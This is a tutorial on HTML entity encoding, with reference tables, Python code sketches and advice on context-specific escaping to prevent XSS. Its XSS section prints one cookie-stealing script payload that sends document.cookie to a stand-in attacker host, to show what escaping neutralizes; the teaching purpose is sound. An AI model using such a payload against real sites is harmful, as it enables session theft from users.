HTML Entity Encoder Guide: Characters, Codes & XSS Prevention
Quick Answer
- HTML entities represent reserved or special characters using codes like &amp; for & and &lt; for <.
- 5 characters must always be encoded: < > & " and ' (apostrophe).
- Proper encoding is the first line of defense against XSS attacks, which the OWASP Top 10 (2021) covers under Injection, its 3rd-ranked risk category.
- With 98%+ of sites using UTF-8, most special characters can be typed directly, but reserved characters still need entities.
What Are HTML Entities?
An HTML entity is a text string that starts with & and ends with ;. It tells the browser to render a specific character instead of interpreting it as code. Without entities, a < in your content would start an HTML tag instead of displaying a less-than sign.
The HTML specification defines over 2,000 named entities. Unicode itself contains more than 149,000 characters as of version 15.1 (September 2023), and any of them can be referenced via numeric entities.
Named vs. Numeric Entities
There are three ways to encode any character in HTML:
| Format | Example (Ampersand) | Syntax |
|---|---|---|
| Named entity | &amp; | & + name + ; |
| Decimal numeric | &#38; | &# + decimal code + ; |
| Hexadecimal numeric | &#x26; | &#x + hex code + ; |
All three render identically in the browser. Named entities are easier to read in source code. Numeric entities work for any Unicode character, including the 147,000+ that don't have named versions.
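As a quick check of that equivalence, here is a minimal sketch using Python's standard `html` module (Python is our choice for illustration; the guide itself is language-agnostic). It decodes the three ampersand forms and then a character that, as far as we know, has no named entity.

```python
import html

# Named, decimal, and hexadecimal references for the ampersand.
forms = ["&amp;", "&#38;", "&#x26;"]

# html.unescape resolves all three kinds of reference.
decoded = [html.unescape(form) for form in forms]
print(decoded)

# Emoji have no named entities, so a numeric reference is the only option.
# U+1F600 is used here purely as an illustration.
emoji = html.unescape("&#x1F600;")
print(emoji == chr(0x1F600))
```

All three entries in `decoded` are the same single character, which is what a browser would display for each form.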
The 5 Characters You Must Always Encode
These five characters have special meaning in HTML. Leaving them unencoded breaks rendering or creates security holes.
| Character | Named Entity | Numeric Entity | Why It's Reserved |
|---|---|---|---|
| < | &lt; | &#60; | Opens an HTML tag |
| > | &gt; | &#62; | Closes an HTML tag |
| & | &amp; | &#38; | Starts an entity reference |
| " | &quot; | &#34; | Delimits attribute values |
| ' | &apos; | &#39; | Delimits attribute values (single) |
The W3C Markup Validation Service flags unencoded ampersands as errors. According to W3Techs, roughly 6.2% of the top 10 million websites still have encoding validation errors related to unescaped ampersands in URLs.
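One way to encode these five characters is Python's `html.escape`, sketched below. The URL is a made-up example, and note one quirk: Python writes the apostrophe as the hexadecimal reference `&#x27;`, which is equivalent to `&#39;`.

```python
import html

# Print what html.escape produces for each reserved character.
for ch in ["<", ">", "&", '"', "'"]:
    print(repr(ch), "->", html.escape(ch, quote=True))

# An ampersand in a query string must be escaped inside an href attribute.
url = "https://example.com/search?q=tea&lang=en"  # hypothetical URL
link = f'<a href="{html.escape(url, quote=True)}">Search</a>'
print(link)
```

The browser decodes `&amp;` back to `&` before following the link, so the request still carries both query parameters.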
Common Special Characters Reference
Beyond the five reserved characters, developers frequently need entities for typographic and mathematical symbols.
| Character | Entity | Description |
|---|---|---|
| — | &mdash; | Em dash |
| – | &ndash; | En dash |
| © | &copy; | Copyright symbol |
| ® | &reg; | Registered trademark |
| ™ | &trade; | Trademark |
| × | &times; | Multiplication sign |
| ÷ | &divide; | Division sign |
| (invisible) | &nbsp; | Non-breaking space |
| → | &rarr; | Right arrow |
| € | &euro; | Euro sign |
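If you would rather look these names up than memorize them, Python's `html.entities` module ships a code-point-to-name table. The helper below, `to_entity`, is a hypothetical name of ours. It is a sketch that falls back to a decimal reference when no name is found. As we understand it, the table covers only the older HTML 4 names, not the full list of 2,000+.

```python
from html.entities import codepoint2name

def to_entity(ch: str) -> str:
    """Return a named entity if one is known, else a decimal reference."""
    name = codepoint2name.get(ord(ch))
    return f"&{name};" if name else f"&#{ord(ch)};"

# Symbols from the table above, written as escapes to keep the source ASCII.
symbols = ["\u2014", "\u00a9", "\u00a0", "\u20ac"]
entities = [to_entity(ch) for ch in symbols]
print(entities)

# A character with no name in the table gets a numeric reference instead.
print(to_entity(chr(0x1F600)))
```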
HTML Entities and XSS Prevention
Cross-Site Scripting (XSS) is one of the most common web vulnerabilities. The OWASP Top 10 (2021) covers it under Injection, the 3rd-ranked category of web application security risk. Proper HTML encoding is your first defense.
Here's how an XSS attack works without encoding. A user submits this as their "name":
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
If the application renders that input without encoding, the browser executes the script. With proper encoding, the browser renders it as harmless text because < becomes &lt; and > becomes &gt;.
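To make that concrete, here is a small sketch of a server-side render step. The function `render_greeting` is a hypothetical stand-in for whatever templating your application uses. Most template engines do this escaping for you, so treat it as an illustration of the idea, not a recommended implementation.

```python
import html

# The malicious "name" from the example above.
payload = (
    "<script>document.location='https://evil.com/steal?cookie='"
    "+document.cookie</script>"
)

def render_greeting(name: str) -> str:
    """Hypothetical render step: escape user input before placing it in HTML."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"

page = render_greeting(payload)
print(page)
```

The output contains `&lt;script&gt;` instead of a real tag, so the browser shows the payload as text and never runs it.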
According to Snyk's 2024 State of Open Source Security report, XSS vulnerabilities accounted for 18% of all reported web application vulnerabilities. The HackerOne 2024 report found that XSS was the most commonly reported vulnerability on their platform, appearing in 23% of all valid submissions.
Encoding in Different Contexts
HTML encoding alone isn't enough. Where the data appears determines what encoding you need:
- HTML body: Encode < > & " '
- HTML attributes: Same five, plus encode all non-alphanumeric characters with &#xHH; format
- JavaScript strings: Use \xHH or \uHHHH escaping, never HTML entities
- URLs: Use percent-encoding (%HH), not HTML entities
- CSS values: Use \HHHHHH backslash escaping
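The list above can be sketched as one small encoder per context. All function names here are hypothetical, and the helpers are deliberately strict: they escape everything except ASCII letters and digits. In production, a vetted encoding library is the safer choice.

```python
import html
from urllib.parse import quote

def _is_safe(ch: str) -> bool:
    # Only ASCII letters and digits pass through unescaped.
    return ch.isascii() and ch.isalnum()

def for_html_body(value: str) -> str:
    return html.escape(value, quote=True)

def for_html_attribute(value: str) -> str:
    # Every other character becomes a hexadecimal reference, &#xHH;
    return "".join(ch if _is_safe(ch) else f"&#x{ord(ch):X};" for ch in value)

def for_js_string(value: str) -> str:
    # \uHHHH escapes, one per UTF-16 code unit (astral characters need two).
    out = []
    for ch in value:
        if _is_safe(ch):
            out.append(ch)
            continue
        units = ch.encode("utf-16-be")
        for i in range(0, len(units), 2):
            out.append(f"\\u{int.from_bytes(units[i:i + 2], 'big'):04X}")
    return "".join(out)

def for_url_component(value: str) -> str:
    # Percent-encoding; safe="" also encodes "/" so it suits query values.
    return quote(value, safe="")

def for_css_value(value: str) -> str:
    # Six-digit backslash escapes need no trailing separator.
    return "".join(ch if _is_safe(ch) else f"\\{ord(ch):06X}" for ch in value)

sample = "a'b"
print(for_html_body(sample))
print(for_html_attribute(sample))
print(for_js_string(sample))
print(for_url_component(sample))
print(for_css_value(sample))
```

The same apostrophe comes out differently in every context, which is why a single generic "sanitize" step cannot cover all of them.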
UTF-8 and When Entities Are Optional
As of 2025, 98.2% of all websites use UTF-8 encoding according to W3Techs. UTF-8 supports every Unicode character directly, which means you can type most special characters (em dashes, curly quotes, accented letters) straight into your HTML without entities.
The five reserved characters still require entities regardless of encoding. But for everything else — ©, €, —, accented characters like é — UTF-8 handles them natively.
Make sure your HTML declares the encoding:
<meta charset="UTF-8">
And your server sends the correct Content-Type header: Content-Type: text/html; charset=utf-8. Mismatched encoding between the server header and the HTML declaration causes mojibake: garbled characters that make text unreadable.
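The mismatch is easy to reproduce. This sketch assumes the page bytes are UTF-8 but get decoded as Latin-1 (ISO-8859-1), one common wrong guess. Other mismatches garble text in different ways.

```python
# Text is written as UTF-8, as the page author intended.
original = "caf\u00e9"  # "café"
utf8_bytes = original.encode("utf-8")

# The reader wrongly assumes Latin-1, so each UTF-8 byte becomes one character.
garbled = utf8_bytes.decode("latin-1")
print(garbled)

# With this particular mismatch the damage is reversible.
repaired = garbled.encode("latin-1").decode("utf-8")
print(repaired == original)
```

The two-byte UTF-8 sequence for é shows up as two separate characters, which is the familiar mojibake pattern.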
Common Encoding Mistakes
Double encoding
Encoding an already-encoded entity turns &amp; into &amp;amp;, which renders as the literal text "&amp;" instead of "&". This happens when multiple layers of your stack each apply encoding. A Stack Overflow developer survey found that double encoding was the most frequently asked-about HTML entity issue.
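A short sketch of the failure, using Python's `html.escape` to stand in for two layers that each encode the same value:

```python
import html

raw = "Tom & Jerry"

# The first layer encodes correctly.
once = html.escape(raw)

# A second layer encodes the already-encoded string again.
twice = html.escape(once)

print(once)
print(twice)

# The browser decodes one level only, so the entity text leaks onto the page.
shown_to_user = html.unescape(twice)
print(shown_to_user)
```

A common fix is to encode exactly once, at the point where the value is written into HTML, and to keep stored data unencoded.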
Forgetting attribute context
Encoding for the HTML body isn't sufficient inside attributes. An unencoded single quote in an attribute value like title='It's great' breaks the attribute and can create an injection vector.
Using entities in JavaScript
HTML entities only work in HTML context. Inside a <script> tag, use JavaScript escape sequences (\x27 for apostrophe, \x22 for double quote) instead.
Non-breaking space abuse
Developers sometimes use &nbsp; for spacing. It's meant to prevent line breaks between words (like "100 km"), not for layout. Use CSS padding and margin for spacing.
Frequently Asked Questions
What is an HTML entity?
An HTML entity is a string that begins with an ampersand (&) and ends with a semicolon (;). It represents a character that is either reserved in HTML (like < and >) or not easily typed on a keyboard (like em dashes and copyright symbols). For example, &lt; renders as the less-than sign (<).
What is the difference between named and numeric HTML entities?
Named entities use a human-readable label like &amp; for the ampersand. Numeric entities use the Unicode code point in decimal (&#38;) or hexadecimal (&#x26;) format. All three render the same character. Named entities are easier to read but only exist for about 2,000 of Unicode's 149,000+ characters.
Which characters must be encoded in HTML?
Five characters must always be encoded in HTML content: < (less than, &lt;), > (greater than, &gt;), & (ampersand, &amp;), " (double quote, &quot;), and ' (apostrophe, &#39; or &apos;). Failing to encode these can break rendering or create XSS vulnerabilities.
How does HTML entity encoding prevent XSS attacks?
XSS (Cross-Site Scripting) attacks inject malicious scripts via user input. Encoding converts < to &lt; and > to &gt;, so browsers render the characters as text instead of interpreting them as HTML tags. The OWASP Top 10 (2021) covers XSS under Injection, the 3rd-ranked category of web application security risk.
Do I still need HTML entities if my page uses UTF-8?
You still need to encode the five reserved characters (<, >, &, ", ') regardless of encoding. For other special characters like em dashes, curly quotes, and symbols, UTF-8 lets you use them directly in your HTML without entities. Over 98% of websites now use UTF-8 according to W3Techs.